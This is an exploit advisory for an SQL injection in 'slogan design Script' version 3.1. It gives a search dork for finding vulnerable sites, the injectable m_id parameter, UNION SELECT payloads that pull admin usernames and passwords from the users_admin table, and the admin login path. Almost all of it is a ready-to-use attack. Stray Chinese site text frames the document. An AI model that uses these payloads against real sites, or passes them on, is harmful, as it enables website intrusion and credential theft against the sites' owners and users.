扫码分享
验证:
体验盒子Title: slogan design Script SQL Injection Vulnerability
# Version:
3.1
# Author: Mr.P3rfekT
# Software Site:
http://www.slogandesign.co.il
# Tested on Lunix
# CVE : N/A
###############
Founded By Mr.P3rfekT --- We Will Not Go Down ###############
#
Dork : " inurl:"index.php?m_id="
# Helllo Allz.
#
Exploit :
http://[site]/path/index.php?m_id={SQLi}
#
Poc Username:
union select
1,2,3,4,5,6,7,8,name,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28
from users_admin
# Poc Password:
union select
1,2,3,4,5,6,7,8,pass,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28
from users_admin
# Demo:
http://[site]/union
select
1,2,3,4,5,6,7,8,name,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28
from users_admin
# Admin Login
#
http://[site]/admin/login.php
# ./done.
####################################################################
体验盒子
